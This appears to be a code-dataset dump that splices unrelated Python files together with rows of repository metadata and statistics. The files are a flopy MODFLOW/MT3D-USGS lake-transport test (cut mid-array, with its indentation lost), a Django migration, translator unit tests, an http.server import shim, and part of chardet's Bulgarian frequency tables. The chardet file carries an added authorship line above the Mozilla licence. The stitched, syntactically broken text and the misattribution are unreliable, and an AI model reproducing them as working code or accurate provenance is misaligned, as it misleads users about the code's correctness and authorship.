0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
lkarr1 = np.array(lkarr1)
lkarr2 = np.array(lkarr2)
lkarr1 = lkarr1.reshape(top1.shape)
lkarr2 = lkarr2.reshape(top1.shape)
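# Layer 3 contains no lake cells, so its lake-ID array is all zeros.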
lkarr3 = np.zeros(top1.shape)
lkarr = [lkarr1, lkarr2, lkarr3]
lkarr = np.array(lkarr)
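# bdlknc holds the lakebed leakance for each lake cell; cells are picked out
# by their lake ID in lkarr, with a slightly different leakance per lake.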
bdlk1 = np.zeros(top1.shape)
bdlk2 = np.zeros(top1.shape)
bdlk3 = np.zeros(top1.shape)
bdlk1[lkarr1 == 1] = 1e-8
bdlk1[lkarr1 == 2] = 2e-8
bdlk1[lkarr1 == 3] = 1.5e-8
bdlk2[lkarr2 == 1] = 1e-8
bdlk2[lkarr2 == 2] = 2e-8
bdlk2[lkarr2 == 3] = 1.5e-8
bdlk = [bdlk1, bdlk2, bdlk3]
bdlknc = np.array(bdlk)
nlakes = int(np.max(lkarr))
ipakcb = 3 # From above
theta = -1. # Implicit
nssitr = 99 # Maximum number of iterations for Newton's method
sscncr = 1.000e-02 # Convergence criterion for equilibrium lake stage solution
surfdep = 2.000e-01 # Height of small topological variations in lake-bottom
stages = [200.0, 200.0, 200.0] # Initial stage of each lake at the beginning of the run
stage_range = [(160.0, 220.0),
               (170.0, 220.0),
               (180.0, 220.0)] # Minimum and maximum stage allowed for each lake
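# flux_data rows give the specified [precipitation, evaporation, runoff,
# withdrawal] rates for each lake in stress period 0 (all zero here).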
flux_data = {0: [[0.0, 0.0, 0.0, 0.0],
                 [0.0, 0.0, 0.0, 0.0],
                 [0.0, 0.0, 0.0, 0.0]]}
lak = flopy.modflow.ModflowLak(mf, nlakes=nlakes, ipakcb=ipakcb, theta=theta,
                               nssitr=nssitr, sscncr=sscncr, surfdep=surfdep,
                               stages=stages, stage_range=stage_range, lakarr=lkarr,
                               bdlknc=bdlknc, flux_data=flux_data, unit_number=16)
## Instantiate linkage with mass transport routing (LMT) package for MODFLOW-NWT (generates linker file)
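# LMT writes the flow-transport link (FTL) file that MT3D-USGS reads;
# package_flows=['lak'] adds the lake-groundwater exchange terms to it.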
lmt = flopy.modflow.ModflowLmt(mf, output_file_name='lkttest.ftl',
                               output_file_header='extended',
                               output_file_format='formatted',
                               package_flows=['lak'])
## Now work on MT3D-USGS file creation
mt = flopy.mt3d.Mt3dms(modflowmodel=mf, modelname=modelname, model_ws=modelpth,
                       version='mt3d-usgs', namefile_ext='mtnam', exe_name=mtexe,
                       ftlfilename='lkttest.ftl', ftlfree=True)
## Instantiate basic transport (BTN) package for MT3D-USGS
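# Two species are simulated (ncomp=2) and both are mobile (mcomp=2); sconc2
# carries the starting concentration for the second species.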
ncomp = 2
mcomp = 2
lunit = 'FT'
laycon = 1
sconc = 0.0
sconc2 = 0.0
prsity = 0.3
cinact = -1.0
thkmin = 0.01
nprs = -1
nprobs = 1
nprmas = 1
dt0 = 0.
nstp = 1
mxstrn = 50000
tsmult = 1
ttsmult = 1.
ttsmax = 0
perlen = 86400.
btn = flopy.mt3d.Mt3dBtn(mt, lunit=lunit, ncomp=ncomp, mcomp=mcomp,
                         sconc=sconc, prsity=prsity, cinact=cinact,
                         laycon=laycon, thkmin=thkmin, nprs=nprs, nprobs=nprobs,
                         chkmas=True, nprmas=nprmas, perlen=perlen, dt0=dt0,
                         nstp=nstp, tsmult=tsmult, mxstrn=mxstrn,
                         ttsmult=ttsmult, ttsmax=ttsmax, sconc2=sconc2)
## Instantiate advection (ADV) package for MT3D-USGS
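# mixelm=0 selects the standard finite-difference advection scheme; mxpart
# only matters for the particle-based (MOC) schemes and is unused here.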
mixelm = 0
percel = 0.7500
mxpart = 5000
nadvfd = 1 # (1 = Upstream weighting)
adv = flopy.mt3d.Mt3dAdv(mt, mixelm=mixelm, percel=percel, mxpart=mxpart,
                         nadvfd=nadvfd)
## Instantiate generalized conjugate gradient solver (GCG) package for MT3D-USGS
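# One outer iteration (mxiter=1) suffices when no nonlinear sorption is
# simulated; iter1 caps the inner GCG iterations per outer iteration.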
mxiter = 1
iter1 = 50
isolve = 1
ncrs = 0
accl = 1.000000
cclose = 1.00e-05
iprgcg = 0
gcg = flopy.mt3d.Mt3dGcg(mt, mxiter=mxiter, iter1=iter1,
                         isolve=isolve, ncrs=ncrs, accl=accl,
                         cclose=cclose, iprgcg=iprgcg)
## Instantiate source-sink mixing (SSM) package for MT3D-USGS
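# No conventional point sources/sinks are specified; the lake-aquifer
# exchange is handled by the LKT package below.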
mxss = 0
ssm = flopy.mt3d.Mt3dSsm(mt, mxss=mxss)
## Instantiate LKT package
nlkinit = 3
mxlkbc = 12
icbclk = 0
ietlak = 0
coldlak = [2., 1., 6.]
coldlak2 = [3., 2., 7.] # Starting concentration for species 2
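# coldlak and coldlak2 are the initial lake concentrations for species 1 and
# 2; each lkt_flux_data row is [lake number, boundary-condition type,
# species-1 value, species-2 value].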
lkt_flux_data = {0: [[0, 1, 0.0, 0.0],
                     [1, 1, 0.0, 0.0],
                     [2, 1, 0.0, 0.0]]}
lkt = flopy.mt3d.Mt3dLkt(mt, nlkinit=nlkinit, mxlkbc=mxlkbc, icbclk=icbclk,
                         ietlak=ietlak, coldlak=coldlak,
                         lk_stress_period_data=lkt_flux_data, coldlak2=coldlak2)
mf.write_input()
mt.write_input()
# Make sure the just written files are loadable
namfile = modelname + '.nam'
mf = flopy.modflow.Modflow.load(namfile, model_ws=tpth,
                                version='mfnwt', verbose=True,
                                exe_name=mfnwt_exe)
namfile = modelname + '.mtnam'
mt = flopy.mt3d.mt.Mt3dms.load(namfile, model_ws=tpth, verbose=True,
                               version='mt3d-usgs', exe_name=mt3d_usgs_exe)
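# The models could be run here with mf.run_model() and mt.run_model(); this
# test only checks that the freshly written input files load back cleanly.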
return
if __name__ == '__main__':
    test_lkt_with_multispecies()
| 138.461279 | 542 | 0.455049 | 23,608 | 82,246 | 1.582938 | 0.021772 | 0.450308 | 0.651699 | 0.838534 | 0.848301 | 0.844207 | 0.843805 | 0.840541 | 0.835617 | 0.835617 | 0 | 0.509963 | 0.259842 | 82,246 | 593 | 543 | 138.694772 | 0.103918 | 0.022725 | 0 | 0.403614 | 0 | 0 | 0.001768 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.002008 | false | 0 | 0.01004 | 0 | 0.014056 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
9bfe89021494e44c9dc9b06f7c0351665c7a3990 | 1295 | py | Python | api/barriers/migrations/0064_auto_20200623_1522.py | cad106uk/market-access-api | a357c33bbec93408b193e598a5628634126e9e99 | ["MIT"] | null | null | null | api/barriers/migrations/0064_auto_20200623_1522.py | cad106uk/market-access-api | a357c33bbec93408b193e598a5628634126e9e99 | ["MIT"] | null | null | null | api/barriers/migrations/0064_auto_20200623_1522.py | cad106uk/market-access-api | a357c33bbec93408b193e598a5628634126e9e99 | ["MIT"] | null | null | null | # Generated by Django 2.2.12 on 2020-06-23 15:22
from django.db import migrations, models
class Migration(migrations.Migration):

    dependencies = [
        ('barriers', '0063_auto_20200428_1008'),
    ]

    operations = [
        migrations.AddField(
            model_name='barrierinstance',
            name='public_eligibility',
            field=models.BooleanField(default=None, help_text='Mark the barrier as either publishable or unpublishable to the public.', null=True),
        ),
        migrations.AddField(
            model_name='barrierinstance',
            name='public_eligibility_summary',
            field=models.TextField(default=None, help_text='Public eligibility summary if provided by user.', null=True),
        ),
        migrations.AddField(
            model_name='historicalbarrierinstance',
            name='public_eligibility',
            field=models.BooleanField(default=None, help_text='Mark the barrier as either publishable or unpublishable to the public.', null=True),
        ),
        migrations.AddField(
            model_name='historicalbarrierinstance',
            name='public_eligibility_summary',
            field=models.TextField(default=None, help_text='Public eligibility summary if provided by user.', null=True),
        ),
    ]
| 38.088235 | 147 | 0.654054 | 135 | 1,295 | 6.148148 | 0.4 | 0.122892 | 0.110843 | 0.13012 | 0.816867 | 0.816867 | 0.816867 | 0.816867 | 0.748193 | 0.748193 | 0 | 0.032888 | 0.248649 | 1,295 | 33 | 148 | 39.242424 | 0.820144 | 0.035521 | 0 | 0.740741 | 1 | 0 | 0.347233 | 0.100241 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.037037 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5006a05149a5a793fd64a2e84ccc6bde3f8607df | 1,216 | py | Python | final_project/machinetranslation/tests/tests.py | remiborredon/xzceb-flask_eng_fr | 3fa67bc0cbe88de9f9595fbf5b40178d8b45ef80 | ["Apache-2.0"] | null | null | null | final_project/machinetranslation/tests/tests.py | remiborredon/xzceb-flask_eng_fr | 3fa67bc0cbe88de9f9595fbf5b40178d8b45ef80 | ["Apache-2.0"] | null | null | null | final_project/machinetranslation/tests/tests.py | remiborredon/xzceb-flask_eng_fr | 3fa67bc0cbe88de9f9595fbf5b40178d8b45ef80 | ["Apache-2.0"] | null | null | null | import unittest
import translator
class TestFr2EnMethod(unittest.TestCase):

    def test_translateBonjour(self):
        frenchText = 'Bonjour'
        translatedText = translator.french_to_english(frenchText)
        self.assertEqual(translatedText, "Hello")

    def test_translateHello(self):
        frenchText = 'Hello'
        translatedText = translator.french_to_english(frenchText)
        self.assertEqual(translatedText, "Hello")

    def test_translateNull(self):
        frenchText = ''
        with self.assertRaises(Exception):
            translator.french_to_english(frenchText)


class TestEn2FrMethod(unittest.TestCase):

    def test_translateBonjour(self):
        englishText = 'Bonjour'
        translatedText = translator.english_to_french(englishText)
        self.assertEqual(translatedText, "Bonjour")

    def test_translateHello(self):
        englishText = 'Hello'
        translatedText = translator.english_to_french(englishText)
        self.assertEqual(translatedText, "Bonjour")

    def test_translateNull(self):
        englishText = ''
        with self.assertRaises(Exception):
            translator.english_to_french(englishText)


if __name__ == '__main__':
    unittest.main() | 32 | 64 | 0.695724 | 109 | 1,216 | 7.522936 | 0.247706 | 0.05122 | 0.126829 | 0.190244 | 0.887805 | 0.826829 | 0.826829 | 0.826829 | 0.746341 | 0.746341 | 0 | 0.002101 | 0.217105 | 1,216 | 38 | 65 | 32 | 0.859244 | 0 | 0 | 0.733333 | 0 | 0 | 0.046015 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | false | 0 | 0.066667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8
ac9ca6d48636eab469bb15e16756e584d47ddfe3 | 171 | py | Python | kayako_exporter/compat.py | Eksmo/kayako-exporter | 69b2da804600de8dee925e8f3c5d94afc9a3e646 | ["BSD-2-Clause"] | 1 | 2021-02-02T11:58:27.000Z | 2021-02-02T11:58:27.000Z | kayako_exporter/compat.py | MyBook/kayako-exporter | 69b2da804600de8dee925e8f3c5d94afc9a3e646 | ["BSD-2-Clause"] | null | null | null | kayako_exporter/compat.py | MyBook/kayako-exporter | 69b2da804600de8dee925e8f3c5d94afc9a3e646 | ["BSD-2-Clause"] | null | null | null | # coding: utf-8
try:
    # Python 3 location of the HTTP server classes.
    from http.server import HTTPServer, BaseHTTPRequestHandler
except ImportError:
    # Fall back to the Python 2 module name.
    from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
| 24.428571 | 65 | 0.807018 | 17 | 171 | 8.117647 | 0.764706 | 0.231884 | 0.550725 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006849 | 0.146199 | 171 | 6 | 66 | 28.5 | 0.938356 | 0.076023 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
acc312b5a9bb3d7430015561ee95a67e8460cafe | 12,686 | py | Python | venv/lib/python3.8/site-packages/pip/_vendor/chardet/langbulgarianmodel.py | realxwx/leetcode-solve | 3a7d7d8e92a5fd5fecc347d141a1c532b92e763e | ["Apache-2.0"] | null | null | null | venv/lib/python3.8/site-packages/pip/_vendor/chardet/langbulgarianmodel.py | realxwx/leetcode-solve | 3a7d7d8e92a5fd5fecc347d141a1c532b92e763e | ["Apache-2.0"] | null | null | null | venv/lib/python3.8/site-packages/pip/_vendor/chardet/langbulgarianmodel.py | realxwx/leetcode-solve | 3a7d7d8e92a5fd5fecc347d141a1c532b92e763e | ["Apache-2.0"] | null | null | null | # Copyright (c) 2020
# Author: xiaoweixiang
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# 255: Control characters that usually do not exist in any text
# 254: Carriage/Return
# 253: symbols (punctuation) that do not belong to words
# 252: 0 - 9
# Character Mapping Table:
# this table is modified based on win1251BulgarianCharToOrderMap, so
# only numbers < 64 are known to be valid
Latin5_BulgarianCharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253, 77, 90, 99,100, 72,109,107,101, 79,185, 81,102, 76, 94, 82, # 40
110,186,108, 91, 74,119, 84, 96,111,187,115,253,253,253,253,253, # 50
253, 65, 69, 70, 66, 63, 68,112,103, 92,194,104, 95, 86, 87, 71, # 60
116,195, 85, 93, 97,113,196,197,198,199,200,253,253,253,253,253, # 70
194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209, # 80
210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225, # 90
81,226,227,228,229,230,105,231,232,233,234,235,236, 45,237,238, # a0
31, 32, 35, 43, 37, 44, 55, 47, 40, 59, 33, 46, 38, 36, 41, 30, # b0
39, 28, 34, 51, 48, 49, 53, 50, 54, 57, 61,239, 67,240, 60, 56, # c0
1, 18, 9, 20, 11, 3, 23, 15, 2, 26, 12, 10, 14, 6, 4, 13, # d0
7, 8, 5, 19, 29, 25, 22, 21, 27, 24, 17, 75, 52,241, 42, 16, # e0
62,242,243,244, 58,245, 98,246,247,248,249,250,251, 91,252,253, # f0
)
win1251BulgarianCharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253, 77, 90, 99,100, 72,109,107,101, 79,185, 81,102, 76, 94, 82, # 40
110,186,108, 91, 74,119, 84, 96,111,187,115,253,253,253,253,253, # 50
253, 65, 69, 70, 66, 63, 68,112,103, 92,194,104, 95, 86, 87, 71, # 60
116,195, 85, 93, 97,113,196,197,198,199,200,253,253,253,253,253, # 70
206,207,208,209,210,211,212,213,120,214,215,216,217,218,219,220, # 80
221, 78, 64, 83,121, 98,117,105,222,223,224,225,226,227,228,229, # 90
88,230,231,232,233,122, 89,106,234,235,236,237,238, 45,239,240, # a0
73, 80,118,114,241,242,243,244,245, 62, 58,246,247,248,249,250, # b0
31, 32, 35, 43, 37, 44, 55, 47, 40, 59, 33, 46, 38, 36, 41, 30, # c0
39, 28, 34, 51, 48, 49, 53, 50, 54, 57, 61,251, 67,252, 60, 56, # d0
1, 18, 9, 20, 11, 3, 23, 15, 2, 26, 12, 10, 14, 6, 4, 13, # e0
7, 8, 5, 19, 29, 25, 22, 21, 27, 24, 17, 75, 52,253, 42, 16, # f0
)
# Model Table:
# total sequences: 100%
# first 512 sequences: 96.9392%
# first 1024 sequences: 3.0618%
# rest sequences: 0.2992%
# negative sequences: 0.0020%
BulgarianLangModel = (
0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,2,3,3,3,3,3,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,2,2,3,2,2,1,2,2,
3,1,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,3,3,3,3,3,3,3,0,3,0,1,
0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,2,3,3,3,3,3,3,3,3,0,3,1,0,
0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,1,3,2,3,3,3,3,3,3,3,3,0,3,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,1,3,2,3,3,3,3,3,3,3,3,0,3,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,2,3,2,2,1,3,3,3,3,2,2,2,1,1,2,0,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,2,3,2,2,3,3,1,1,2,3,3,2,3,3,3,3,2,1,2,0,2,0,3,0,0,
0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,1,3,3,3,3,3,2,3,2,3,3,3,3,3,2,3,3,1,3,0,3,0,2,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,1,3,3,2,3,3,3,1,3,3,2,3,2,2,2,0,0,2,0,2,0,2,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,3,0,3,3,3,2,2,3,3,3,1,2,2,3,2,1,1,2,0,2,0,0,0,0,
1,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,2,3,3,1,2,3,2,2,2,3,3,3,3,3,2,2,3,1,2,0,2,1,2,0,0,
0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,1,3,3,3,3,3,2,3,3,3,2,3,3,2,3,2,2,2,3,1,2,0,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,3,3,3,1,1,1,2,2,1,3,1,3,2,2,3,0,0,1,0,1,0,1,0,0,
0,0,0,1,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,2,2,3,2,2,3,1,2,1,1,1,2,3,1,3,1,2,2,0,1,1,1,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,1,3,2,2,3,3,1,2,3,1,1,3,3,3,3,1,2,2,1,1,1,0,2,0,2,0,1,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,2,2,3,3,3,2,2,1,1,2,0,2,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,0,1,2,1,3,3,2,3,3,3,3,3,2,3,2,1,0,3,1,2,1,2,1,2,3,2,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,1,1,2,3,3,3,3,3,3,3,3,3,3,3,3,0,0,3,1,3,3,2,3,3,2,2,2,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,0,3,3,3,3,3,2,1,1,2,1,3,3,0,3,1,1,1,1,3,2,0,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,2,2,2,3,3,3,3,3,3,3,3,3,3,3,1,1,3,1,3,3,2,3,2,2,2,3,0,2,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,2,3,3,2,2,3,2,1,1,1,1,1,3,1,3,1,1,0,0,0,1,0,0,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,2,3,2,0,3,2,0,3,0,2,0,0,2,1,3,1,0,0,1,0,0,0,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,2,1,1,1,1,2,1,1,2,1,1,1,2,2,1,2,1,1,1,0,1,1,0,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,2,1,3,1,1,2,1,3,2,1,1,0,1,2,3,2,1,1,1,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
